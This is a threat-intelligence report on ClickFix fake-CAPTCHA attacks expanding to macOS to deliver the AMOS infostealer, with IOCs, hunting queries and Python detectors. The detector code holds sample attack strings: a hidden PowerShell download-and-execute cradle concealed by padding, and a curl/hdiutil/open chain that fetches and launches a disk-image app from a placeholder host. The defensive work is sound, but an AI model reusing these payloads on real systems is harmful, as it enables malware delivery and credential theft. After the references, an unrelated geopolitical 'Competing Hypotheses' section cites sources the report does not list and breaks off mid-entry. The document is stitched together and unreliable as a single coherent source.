ClickFix Attacks Expand to macOS
A macOS ClickFix campaign discovered by Palo Alto Networks Unit 42, reported on June 23, 2026, silently downloads and mounts malicious disk images to deploy an infostealer targeting browser credentials, cryptocurrency wallets, and Apple Keychain data [1]. The technique continues to evolve because it turns the user into the execution engine, bypassing most endpoint controls in the process.
ClickFix is not a single malware family. It is a social engineering method where a fake error, CAPTCHA, or verification prompt instructs the victim to open a system utility and paste a command the attacker has silently placed on their clipboard. The victim does the attacker's job for them. That fundamental mechanic has not changed. Everything around it has.
Background: From Commodity Trick to Nation-State Tool
Proofpoint named and documented the ClickFix technique in mid-2024, tracking campaigns from TA571 and ClearFake that used fake browser update pages and error overlays to trick users into running PowerShell commands [2]. In April 2025, Proofpoint documented state-sponsored actors from North Korea (TA427), Iran (TA450), and Russia (UNK_RemoteRogue, TA422) experimenting with ClickFix, moving the technique out of the purely criminal ecosystem [3]. Proofpoint noted that no actor showed repeated sustained use of the technique in the weeks following initial sightings, though TA427 returned to ClickFix with a slightly varied infection chain over two months after initial use [3].
The technique's appeal is straightforward. No malicious file needs to land on disk during the initial stage. Browser-based sandboxes do not inspect clipboard contents. UAC prompts often do not fire because the user is manually opening a trusted system utility. Security awareness programs still train users to watch for malicious links and attachments, not to distrust text they paste into their own terminal.
The New macOS Campaign: Silent DMG Mounting
The campaign reported on June 23, 2026 (based on Unit 42 intelligence first disclosed June 20, 2026) targets macOS users with a fake CAPTCHA page that instructs them to open Terminal and paste a verification command [1]. That command does something users would not expect from a CAPTCHA fix: it downloads a DMG file, silently mounts it using the native hdiutil utility, locates the application bundle inside, and launches it automatically [1].
Once running, the malware targets browser credentials, cryptocurrency wallet data, Apple Keychain data, messaging app information, and user documents [1]. The stealer payload is assessed by Unit 42 to belong to the AMOS (Atomic macOS Stealer) lineage, specifically the modern C++ Odyssey variant [4]. According to Unit 42, the assessment is based on the malware's staging directory, persistence module, and crypto-wallet trojanization behavior [4]. Microsoft separately documented macOS ClickFix campaigns where the malware replaces legitimate cryptocurrency wallet apps with trojanized versions.
This is significant. ClickFix was primarily a Windows problem for most of its lifespan. The macOS variant proves operators are building platform-specific kill chains, not just porting PowerShell commands.
Windows Execution: The Win+R Path and Defensive Response
The standard ClickFix flow on Windows tells users to press Win+R to open the Run dialog, then paste the malicious command. The malicious payload, often a PowerShell command or an mshta.exe call, has already been silently injected into the clipboard by JavaScript running on the page. The user simply completes the sequence, believing they are verifying their identity or resolving a technical issue. From the workstation's perspective, using the Win+R shortcut ensures the process executing the malicious command runs under explorer.exe as its parent process, making the activity appear more legitimate.
Defenders have responded by monitoring Win+R invocations, logging Run dialog usage, and building detections around cmd.exe or powershell.exe spawned from explorer.exe with clipboard-derived arguments.
Mitigating Windows ClickFix Abuse
Defenders have concrete options to reduce exposure from ClickFix execution paths:
Disable the Windows Run Dialog (Win+R) for standard users. Group Policy can be configured to disable the Run command dialog box, closing the primary ClickFix execution path on Windows.
Deploy PowerShell Constrained Language Mode. Enforce via WDAC or AppLocker policies to block arbitrary script execution from pasted commands. Test against business-critical PowerShell workflows before broad deployment.
Monitor process lineage. Any powershell.exe, pwsh.exe, cmd.exe, mshta.exe, or WindowsTerminal.exe process spawned by explorer.exe should generate a high-fidelity alert. This catches the Win+R shortcut path.
Restrict PowerShell execution for non-administrative users. Prevent non-administrative users from executing PowerShell where operationally feasible.
Who Gets Targeted: Drive-By vs. Intentional
ClickFix campaigns split into two targeting models, and the distinction matters for defenders trying to assess their risk.
Drive-By (Opportunistic)
The bulk of ClickFix activity remains opportunistic. Malvertising chains, compromised websites, and SEO-poisoned search results funnel victims to fake CAPTCHA pages or browser update prompts [2]. The macOS campaign Unit 42 found fits this model: users land on a fake verification page and self-infect [1]. These campaigns cast a wide net and rely on volume. Any user browsing the web is a potential target.
Intentional (Targeted)
A growing subset of ClickFix operations targets specific individuals or roles. Proofpoint documented targeted ClickFix campaigns by state-sponsored actors, including TA427 (North Korea) using ClickFix with compromised infrastructure and dynamic DNS services in early 2025, and TA450 (Iran) sending ClickFix phishing emails in November 2024 [3]. Developer-focused campaigns using fake GitHub repository notifications and ClickFix-style verification pages have been documented by multiple vendors, including Sekoia (GitHub issues campaign delivering Lumma Stealer) and Datadog (fake repositories delivering macOS infostealers).
State-sponsored actors assessed to be linked to North Korea (tracked as TA427 by Proofpoint) have experimented with ClickFix in targeted campaigns, though Proofpoint assessed that each state-sponsored actor was only observed with one ClickFix campaign or wave, and it remains unclear whether the technique achieved the success rates these actors expected [3].
Clipboard Hijacking Techniques
ClickFix relies on JavaScript clipboard injection to load payloads into the victim's clipboard. In observed campaigns, the malicious page silently writes a PowerShell or mshta.exe command to the clipboard, then instructs the user to paste it into the Run dialog or PowerShell terminal [2].
Some campaigns use comment strings or padding to hide the actual malicious command. Campaigns have been observed where the victim sees only a benign-looking string in the Run dialog, while the actual PowerShell download cradle is hidden beyond the visible area of the text field [2].
Unit 42's macOS analysis shows the clipboard payload leveraging native macOS utilities (hdiutil, open) rather than downloading a separate script interpreter, which makes the pasted command look more plausible to a technical user who glances at it before executing [1].
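As an added example (not code from the original report, Unit 42, or Proofpoint), the following Python applies the clipboard-payload traits described above to constructed sample strings: an interpreter or native-utility token, a download-and-execute shape, hidden-window or policy-bypass flags, and a command pushed out of the visible area by padding or a trailing lure comment. Domains, command strings and the 60-character visible window are assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Interpreters and native utilities a ClickFix lure asks the victim to paste into.
INTERPRETERS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd(?:\.exe)?\s*/c|hdiutil\s+attach|open\s+/Volumes/|curl|osascript|bash\s+-c)\b",
    re.IGNORECASE,
)
# Download-then-execute shapes: PowerShell cradle, curl piped to a shell, mshta with a URL, DMG mount then open.
CRADLES = [
    re.compile(r"(iwr|invoke-webrequest|downloadstring|net\.webclient).{0,200}\b(iex|invoke-expression)\b", re.I | re.S),
    re.compile(r"\bcurl\b[^|\n]*\|\s*(sh|bash|zsh)\b", re.I),
    re.compile(r"\bmshta(\.exe)?\s+https?://", re.I),
    re.compile(r"hdiutil\s+attach.{0,300}\bopen\s+/Volumes/", re.I | re.S),
]
HIDING_FLAGS = re.compile(r"-(w(indowstyle)?\s+hidden|e(xecutionpolicy|p)\s+bypass|nop(rofile)?)\b", re.I)
LURE_WORDS = re.compile(r"(captcha|verification|not a robot|human|verify)", re.I)
PADDING = re.compile(r"[ \t]{20,}")
COMMENT_LURE = re.compile(r"(#|::|\brem\b|//).*" + LURE_WORDS.pattern, re.I)


@dataclass
class Verdict:
    suspicious: bool
    reasons: List[str] = field(default_factory=list)


def hidden_by_padding(text: str, visible: int = 60) -> bool:
    """True when an interpreter token appears, but the last `visible` characters (what a
    one-line field such as the Run dialog shows after paste, since the caret lands at the
    end) contain none, and the part after the command carries a long whitespace run or a
    comment with lure wording. The 60-character window is an assumption."""
    m = INTERPRETERS.search(text)
    if m is None or INTERPRETERS.search(text[-visible:]):
        return False
    after_cmd = text[m.end():]
    return bool(PADDING.search(after_cmd) or COMMENT_LURE.search(after_cmd))


def classify(text: str) -> Verdict:
    """Score one clipboard write / pasted string. Requires an interpreter token plus at
    least one behavioural signal, so a lone 'curl' in a chat message does not fire."""
    reasons: List[str] = []
    if INTERPRETERS.search(text):
        reasons.append("interpreter_or_native_utility")
        if LURE_WORDS.search(text):
            reasons.append("lure_text_alongside_command")
    if any(p.search(text) for p in CRADLES):
        reasons.append("download_and_execute")
    if HIDING_FLAGS.search(text):
        reasons.append("hidden_window_or_policy_bypass")
    if hidden_by_padding(text):
        reasons.append("command_hidden_beyond_visible_area")
    return Verdict("interpreter_or_native_utility" in reasons and len(reasons) >= 2, reasons)


# Constructed sample clipboard contents (placeholder domains; not observed payloads).
SAMPLES: Dict[str, str] = {
    "win_padded": 'powershell -w hidden -c "iwr http://example.invalid/v | iex"'
                  + " " * 120 + "# I am not a robot - reCAPTCHA Verification ID: 7391",
    "mac_dmg": "curl -s -o /tmp/v.dmg https://example.invalid/v.dmg && hdiutil attach /tmp/v.dmg "
               "&& open /Volumes/Verify/Verify.app",
    "benign_cmd": "git status",
    "benign_url": "https://example.invalid/docs/captcha-verification-faq",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, classify(text))
```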
IOC Table
| Type | Value | Context |
|---|---|---|
| Domain | svs-verificationdate[.]beer | DMG download/staging server for macOS AMOS ClickFix campaign [1][4] |
| Domain | fewfwfwfwfwf[.]info | C2 domain for macOS AMOS ClickFix campaign [4] |
| IP | 178.16.52[.]101 | Hosting IP for svs-verificationdate[.]beer [4] |
| IP | 196.251.107[.]171 | C2 server (port 3000) for macOS AMOS ClickFix campaign [1][4] |
| URL Path Hash | f0038a5f46720da5982b6984ceef10cf99359432e102b12a0b0657498d36f670 | Value observed in URL path on svs-verificationdate[.]beer; may serve as file identifier but not confirmed as standalone file hash [4] |
| Malware | AMOS (Atomic macOS Stealer), Odyssey variant | Infostealer deployed via macOS ClickFix chain [1][4] |
MITRE ATT&CK Mapping
| Technique ID | Name | Relevance |
|---|---|---|
| T1204.002 | User Execution: Malicious File | Victim manually executes pasted command in Terminal or Run dialog, leading to malware execution |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Primary Windows execution method |
| T1059.004 | Command and Scripting Interpreter: Unix Shell | macOS Terminal execution via pasted commands [1] |
| T1115 | Clipboard Data | JavaScript clipboard hijacking to stage payload. Note: T1115 formally covers clipboard data collection; ClickFix uses clipboard writing (injection), which is not formally covered by a current ATT&CK technique. T1115 is used here as the closest available mapping. |
| T1555 | Credentials from Password Stores | Apple Keychain, browser credential theft [1] |
| T1539 | Steal Web Session Cookie | Browser session data [1] |
| T1005 | Data from Local System | Harvesting user documents [1] |
| T1041 | Exfiltration Over C2 Channel | Upload to attacker-controlled server [1] |
Detection and Hunting
Process lineage monitoring is the single highest-value detection. Alert on powershell.exe, pwsh.exe, cmd.exe, mshta.exe, or WindowsTerminal.exe spawned by explorer.exe. On macOS, watch for Terminal.app or iTerm spawning curl, hdiutil, or open in rapid succession.
Splunk example for Windows (Sysmon Event ID 1; pwsh.exe and mshta.exe included to match the list above):

```spl
index=sysmon EventCode=1 (Image="*powershell.exe" OR Image="*pwsh.exe" OR Image="*cmd.exe" OR Image="*mshta.exe" OR Image="*WindowsTerminal.exe")
| where ParentImage LIKE "%explorer.exe"
```

macOS example for osquery (process_events requires the audit or EndpointSecurity event publisher; the tool's direct parent is normally the login shell, so the query resolves both parent and grandparent through the processes table):

```sql
SELECT e.time, e.path, e.cmdline, p.path AS parent_path, gp.path AS grandparent_path
FROM process_events e
LEFT JOIN processes p ON p.pid = e.parent      -- usually zsh/bash
LEFT JOIN processes gp ON gp.pid = p.parent    -- usually Terminal.app or iTerm
WHERE (e.path LIKE '%/hdiutil' OR e.path LIKE '%/curl' OR e.path LIKE '%/open')
  AND (p.path LIKE '%Terminal.app%' OR gp.path LIKE '%Terminal.app%'
       OR p.path LIKE '%iTerm%' OR gp.path LIKE '%iTerm%')
  AND e.time > CAST(strftime('%s', 'now', '-5 minutes') AS INTEGER);
```
DNS monitoring for newly registered or low-reputation domains with unusual TLDs (.beer, .top, .xyz) used as C2 endpoints [1].
Clipboard write monitoring where endpoint tooling supports it. Some EDR solutions may be able to track clipboard API calls from browser processes; verify specific capabilities with your vendor. High-frequency writeText() calls from web content processes warrant investigation.
DMG mount events on macOS. Monitor for hdiutil attach commands executed from Terminal, especially when followed by open commands targeting .app bundles from mounted volumes [1].
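An added example, not part of the original report, that runs the lineage rules from this section over constructed process events: a shell or script host directly under explorer.exe (the Win+R path), curl/hdiutil/open with a Terminal.app or iTerm ancestor (walking past the intermediate shell), and the hdiutil attach followed by open sequence. The event schema, paths and the five-minute sequence window are assumptions.

```python
from dataclasses import dataclass
from typing import Dict, List

# Process names the report says should alert when spawned directly by explorer.exe.
WIN_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "windowsterminal.exe"}
# Native macOS utilities the report says to watch for under a terminal lineage.
MAC_TOOLS = {"hdiutil", "curl", "open"}
# "Rapid succession" window for hdiutil attach -> open; 5 minutes is an assumption.
SEQUENCE_WINDOW_SECS = 300


@dataclass
class ProcEvent:
    time: int       # epoch seconds
    pid: int
    ppid: int
    image: str      # full path of the new process image
    cmdline: str
    host_os: str    # "windows" or "macos"


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent], max_depth: int = 8) -> List[ProcEvent]:
    """Follow ppid links through the event table: parent first, then grandparent, and so on."""
    chain: List[ProcEvent] = []
    pid = ev.ppid
    while pid in by_pid and len(chain) < max_depth:
        parent = by_pid[pid]
        chain.append(parent)
        pid = parent.ppid
    return chain


def is_terminal(ev: ProcEvent) -> bool:
    p = ev.image.lower()
    return "terminal.app/" in p or "iterm" in p


def detect_clickfix(events: List[ProcEvent]) -> List[str]:
    """Return one alert string per rule hit, in time order."""
    by_pid = {e.pid: e for e in events}
    alerts: List[str] = []
    last_attach: Dict[int, int] = {}  # parent shell pid -> time of last "hdiutil attach"
    for ev in sorted(events, key=lambda e: e.time):
        name = basename(ev.image)
        chain = ancestry(ev, by_pid)
        lineage = "<-".join(basename(a.image) for a in chain)
        if ev.host_os == "windows":
            # Direct child of explorer.exe only: a shell two hops away (via an IDE) is not the Win+R path.
            if name in WIN_SHELLS and chain and basename(chain[0].image) == "explorer.exe":
                alerts.append(f"WIN_RUN_DIALOG pid={ev.pid} {name}<-{lineage}: {ev.cmdline}")
        elif ev.host_os == "macos" and name in MAC_TOOLS and any(is_terminal(a) for a in chain):
            alerts.append(f"MAC_TERMINAL_TOOL pid={ev.pid} {name}<-{lineage}: {ev.cmdline}")
            argv = ev.cmdline.split()
            if name == "hdiutil" and "attach" in argv:
                last_attach[ev.ppid] = ev.time
            elif name == "open" and "/Volumes/" in ev.cmdline and ".app" in ev.cmdline:
                t = last_attach.get(ev.ppid)
                if t is not None and 0 <= ev.time - t <= SEQUENCE_WINDOW_SECS:
                    alerts.append(f"MAC_DMG_MOUNT_THEN_OPEN pid={ev.pid} {ev.time - t}s after hdiutil attach: {ev.cmdline}")
    return alerts


def sample_events() -> List[ProcEvent]:
    """Constructed sample telemetry (not real logs; placeholder domains)."""
    w, m = "windows", "macos"
    return [
        ProcEvent(1000, 100, 1, r"C:\Windows\explorer.exe", "explorer.exe", w),
        # Win+R path: PowerShell directly under explorer.exe (should alert).
        ProcEvent(1001, 200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  'powershell -w hidden -c "iwr http://example.invalid/v | iex"', w),
        # Benign: an IDE launched from explorer, then PowerShell from the IDE (should not alert).
        ProcEvent(1002, 250, 100, r"C:\Users\u\AppData\Local\Programs\Code\Code.exe", "Code.exe", w),
        ProcEvent(1003, 300, 250, r"C:\Program Files\PowerShell\7\pwsh.exe", "pwsh -NoLogo", w),
        # macOS ClickFix chain: Terminal -> zsh -> curl, hdiutil attach, open (should alert).
        ProcEvent(2000, 500, 1, "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "Terminal", m),
        ProcEvent(2001, 510, 500, "/bin/zsh", "-zsh", m),
        ProcEvent(2002, 520, 510, "/usr/bin/curl", "curl -s -o /tmp/x.dmg https://example.invalid/x.dmg", m),
        ProcEvent(2003, 530, 510, "/usr/bin/hdiutil", "hdiutil attach /tmp/x.dmg", m),
        ProcEvent(2005, 540, 510, "/usr/bin/open", "open /Volumes/Installer/Installer.app", m),
        # Benign: hdiutil with no terminal in its lineage (should not alert).
        ProcEvent(2100, 600, 1, "/usr/bin/hdiutil", "hdiutil attach /Users/u/Downloads/tool.dmg", m),
    ]


if __name__ == "__main__":
    for line in detect_clickfix(sample_events()):
        print(line)
```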
Analysis
We assess that ClickFix has reached a significant inflection point. It started as a Windows-only social engineering technique and has become a cross-platform initial access method used by both criminal operators and state-sponsored groups. The macOS variant Unit 42 documented shows real development effort: silent DMG mounting, crypto-wallet trojanization behavior, and broad data targeting are not throwaway capabilities [1].
Targeting patterns suggest two parallel tracks running simultaneously. Mass opportunistic campaigns continue to generate volume through malvertising and SEO poisoning. Targeted operations by state-sponsored actors use tailored pretexts, though Proofpoint has noted that state actors have not yet shown sustained repeated use of the technique [3].
Red Sheep Assessment
Confidence: Moderate-High
The sources collectively point toward ClickFix becoming a preferred initial access technique for operations that need to bypass EDR without burning zero-days. The cross-platform expansion to macOS is not a one-off experiment. The Unit 42 campaign shows a mature kill chain: CAPTCHA lure, native utility abuse, crypto wallet replacement, and broad data harvesting [1]. This level of development signals sustained investment.
A contrarian view: ClickFix's reliance on user action is also its ceiling. Every additional step (press this shortcut, click this menu item, paste this text) reduces conversion rates. Browser vendors will likely continue restricting clipboard write APIs, and macOS Sequoia's security controls make unsigned DMG execution harder. The technique is unlikely to disappear, but its effectiveness against well-trained, security-conscious user populations should degrade over time. The real risk likely remains concentrated among organizations with weak user education and no process lineage monitoring.
Defender's Checklist
- [ ] Monitor process spawning from the Win+R path. Add detection rules for `powershell.exe`, `cmd.exe`, `mshta.exe`, and `WindowsTerminal.exe` with parent process `explorer.exe`.
- [ ] Disable the Windows Run dialog for non-administrative users. Use Group Policy to disable the Run command dialog box for standard users, closing the primary ClickFix execution path on Windows.
- [ ] Deploy PowerShell Constrained Language Mode. Enforce via WDAC or AppLocker policies to block arbitrary script execution from pasted commands. Test against business-critical PowerShell workflows before broad deployment.
- [ ] Hunt for macOS ClickFix indicators. Query endpoint logs for `hdiutil attach` executed from Terminal followed by `open` commands targeting mounted DMG volumes. Search DNS logs for the IOC domains: `index=dns (query="svs-verificationdate.beer" OR query="fewfwfwfwfwf.info")` [1][4].
- [ ] Update security awareness training. Specifically train users that web-based CAPTCHA verifications, browser error fixes, and meeting join prompts should never require opening Terminal, Run, or PowerShell and pasting commands. Include ClickFix scenarios in phishing simulations, with examples of fake CAPTCHA and browser update pretexts.
- [ ] Restrict PowerShell execution for non-administrative users. Prevent standard users from executing PowerShell where operationally feasible.
References
[1] https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/
[2] https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
[3] https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix
[4] https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-06-20-ClickFix-campaign-delivers-macOS-infostealer-via-DMG.txt
Competing Hypotheses
Multiple sources offer competing assessments on key analytic questions in this report. The body above reflects the assessed primary line; alternative hypotheses and the indicators that would shift the assessment are surfaced below for analyst review.
China
Question 1.
Primary assessment. Does the downgraded Taiwan invasion timeline reduce or increase the cyber threat?
Alternative hypothesis. View A: The IC assessment that China doesn't plan a 2027 invasion suggests reduced near-term military risk. Source: [22] | View B: The briefing argues (and sources support) that below-threshold cyber and influence operations may intensify as substitutes for kinetic action. Sources: [19], [22], [17]
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 2.
Primary assessment. Is Storm-1175 a state-directed Chinese APT or a financially motivated cybercriminal group?
Alternative hypothesis. View A: The Hacker News [12] labels Storm-1175 as 'China-Linked,' implying state nexus. The briefing places it alongside state-directed infrastructure pre-positioning activities. | View B: Microsoft's primary source describes Storm-1175 as a 'financially motivated cybercriminal' actor, which is distinct from state-directed espionage groups. Web verification confirms Microsoft's characterization.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 3.
Primary assessment. Have PLA purges degraded China's military capabilities?
Alternative hypothesis. View A: The IISS assessed the purges left the military with 'serious deficiencies in its command structure' and PLA exercises took substantially longer to implement in 2025. Sources: [28], [14] | View B: The leadership purges have 'not significantly disrupted the PLA's normal functions or operations' and the effects are temporary, with some arguing the PLA may compensate with more aggressive activity. Sources: [28]
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 4.
Primary assessment. Why did PLAAF incursions into Taiwan's ADIZ decline in early 2026?
Alternative hypothesis. View A: Beijing may be trying to avoid escalating tensions ahead of the Trump-Xi summit (diplomatic signal). Sources: [17] | View B: The decline could relate to ongoing PLA leadership purges that have had a 'paralyzing effect' on the military (operational disruption). Sources: [17], [14], [28]
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 5.
Primary assessment. How many organizations has Salt Typhoon compromised?
Alternative hypothesis. View A: Source [10] and FBI officials cite 'at least 200 companies' worldwide (August 2025 figure). | View B: The Global Cyber Alliance and Nextgov/FCW (August 2025) report that 600+ organizations were notified by the FBI of Salt Typhoon interest in their systems, across 80+ countries, suggesting a much larger scope than 200 confirmed compromises.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 6.
Primary assessment. Will the SCOTUS IEEPA ruling lead to reduced tariffs on China?
Alternative hypothesis. View A: The ruling invalidates all IEEPA tariffs, potentially leading to lower tariff rates on Chinese goods [24]. | View B: The President immediately imposed replacement tariffs under Section 122 of the Trade Act of 1974 (confirmed via web search), with administration officials stating the goal is 'virtually unchanged tariff revenue.' The briefing's Outlook scenario that 'the ruling leads to a reduction in tariffs' may already be overtaken by events.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 7.
Primary assessment. What is the impact of PLA purges on China's cyber capabilities?
Alternative hypothesis. View A: Purges cause 'serious deficiencies' in PLA command structure that are 'likely to be a temporary disturbance' (IISS via [17]). | View B: Red Sheep assessment suggests purges may be motivated by operational security failures related to cyber operation exposure (I-Soon, Expedition Cloud leaks), which could lead to tighter compartmentalization. Source [16] quotes Xi on disloyalty but doesn't specify cyber-related concerns.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 8.
Primary assessment. Has Salt Typhoon been remediated from major U.S. telecom networks?
Alternative hypothesis. View A: Salt Typhoon has NOT been fully remediated: Senate expert testimony, TechCrunch reporting, and FBI officials indicate hackers are 'likely still inside U.S. networks' [9][10]. The FBI's top cyber official said threats are 'still very much ongoing' (confirmed via web search from CyberScoop, Feb 2026). | View B: Major telecoms claim remediation: AT&T stated in late 2024 it detected 'no activity by nation-state actors' and Verizon claimed to have 'contained the cyber incident' (per web search results). However, both companies have refused to provide documentation to the Senate [9].
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Russia
Question 1.
Primary assessment. Does the convergence of Russian and Chinese tradecraft represent coordinated strategy or parallel evolution?
Alternative hypothesis. View A: Finland's Supo [8] assesses Russia has adopted Chinese-style techniques, suggesting deliberate tradecraft adoption. The briefing's Red Sheep assessment frames this as a unified strategic program. | View B: The convergence could reflect independent optimization toward the same low-cost attack surface (consumer edge devices) rather than a coordinated or derivative relationship. Amazon [7] describes it as a cost-benefit decision, not as Chinese emulation.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 2.
Primary assessment. How should the GLOBSEC hybrid incident numbers (150+ EU/NATO vs 321 in Germany) be reconciled?
Alternative hypothesis. View A: The numbers reflect different counting methodologies or temporal windows within the same GLOBSEC report [16], suggesting Germany uses a broader definition of 'hybrid incident' including drone intrusions and disinformation campaigns. | View B: The EU/NATO figure of 150+ may reflect only confirmed/high-confidence incidents while Germany's 321 includes lower-confidence suspected events. The briefing presents both as equivalent metrics.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 3.
Primary assessment. Is the U.S. sanctions relaxation a deliberate strategic deprioritization of cyber deterrence or merely transactional diplomatic maneuvering?
Alternative hypothesis. View A: The OFAC CYBER2 delistings and GL 134 represent a policy shift that deprioritizes cyber-specific sanctions enforcement, potentially reducing the perceived cost of Russian cyber operations. Sources [10], [11], [12] document the pattern of removals. | View B: The removals could be tactical concessions in broader diplomatic negotiations (e.g., tied to energy supply concerns from the Persian Gulf war per Source [11]) rather than a deliberate abandonment of cyber deterrence. No source explicitly confirms a policy directive to deprioritize cyber sanctions.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 4.
Primary assessment. Was Operation Horizon a response to the ELECTRUM/DER attack or to railway sabotage?
Alternative hypothesis. View A: The briefing implies it was launched in response to or in the context of the December 2025 DER attack. | View B: Web search confirms Operation Horizon launched November 21, 2025, before the DER attack, in response to railway sabotage incidents. It was later extended in 2026.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 5.
Primary assessment. Did pro-Russia hacktivists actually achieve OT access to Israeli water systems?
Alternative hypothesis. View A: NoName057(16) claimed 'full access to HMIs of Israeli water management systems' per source [2]. | View B: Flashpoint analysts have not verified these claims per source [2], and the source notes that 'these groups regularly inflate the impact of their attacks for media attention.'
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 6.
Primary assessment. What is the significance of Russia's small 2026 military expansion?
Alternative hypothesis. View A: The briefing's primary read: resource constraints are pushing Moscow to prioritize asymmetric tools (cyber, sabotage) over conventional force growth. | View B: The Red Sheep section offers a contrarian read: the small expansion could indicate strategic confidence that hybrid/cyber tools are delivering sufficient results, making further conventional buildup unnecessary.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 7.
Primary assessment. How quickly did APT28 weaponize CVE-2026-21509 after disclosure?
Alternative hypothesis. View A: Trellix (source [9]) claims weaponization within 24 hours of public disclosure. | View B: Zscaler (Operation Neusploit) observed active exploitation on January 29, three days after the January 26 patch release. Dark Reading headline reads 'Russian Hackers Weaponize Microsoft Office Bug in Just 3 Days.' The 24-hour vs. 3-day discrepancy may reflect different measurement points (disclosure vs. patch release vs. first observed exploitation).
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Iran
Question 1.
Primary assessment. How credible are Handala's claimed attack impacts, given Iranian groups are known to exaggerate?
Alternative hypothesis. View A: Source [3] and Handala's claims cite 200,000 devices wiped, 50TB exfiltrated. FDD [web search] notes these numbers. | View B: FDD analysis [web search] explicitly warns that 'Handala, like other Iranian cyber threat actors, exaggerate the operational impact of its attacks.' The Stryker briefing acknowledges the range (80K-200K) but does not flag the exaggeration concern.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 2.
Primary assessment. Does the ceasefire increase or decrease the cyber threat to U.S. organizations?
Alternative hypothesis. View A: Source [9] and experts cited therein assess the ceasefire will lead to increased cyberattacks on U.S. organizations as hackers shift from regional to U.S. targets. | View B: A standard analysis might assess that cessation of hostilities reduces motivation for retaliatory cyber operations. The briefing's Red Sheep Assessment argues the contrarian view that pauses are more dangerous than active hostilities.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 3.
Primary assessment. What is the actual scope of the Stryker MDM wipe — 80,000 or 200,000 devices?
Alternative hypothesis. View A: Source [3] (tech-insider.org) and Handala's own claims say 200,000+ devices. FDD analysis [web search] says 'over 200,000 employee devices.' | View B: HIPAA Journal [web search] reports 'almost 80,000 Windows devices.' Stryker itself has not confirmed a specific number. The wide range (80,000 to 200,000) reflects uncertainty between Handala's claims and independent estimates.
Indicators that would shift assessment:
- New primary-source reporting that directly contradicts the primary assessment
- Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
- Public statement, indictment, or vendor advisory naming the alternative as authoritative
Question 4.
Primary assessment. Did Iran's internet blackout degrade or fail to degrade its offensive cyber capabilities?
Alternative hypothesis. View A: Unit 42 [6] assesses the blackout 'will likely hinder sophisticated cyberattack coordination' and may lead to 'deviations from previously established patterns' — suggesting degradation of coordination capability. | View B: Unit 42 [6] also notes 'dozens of threat groups operating outside Iran plus pre-planted backdoors kept attacks running at full speed,' and the Red Sheep Assessment argues the blackout has not stopped operations. Check Point [19] confirms Handala operating from Starlink IPs.
Indicators that would shift assessment:
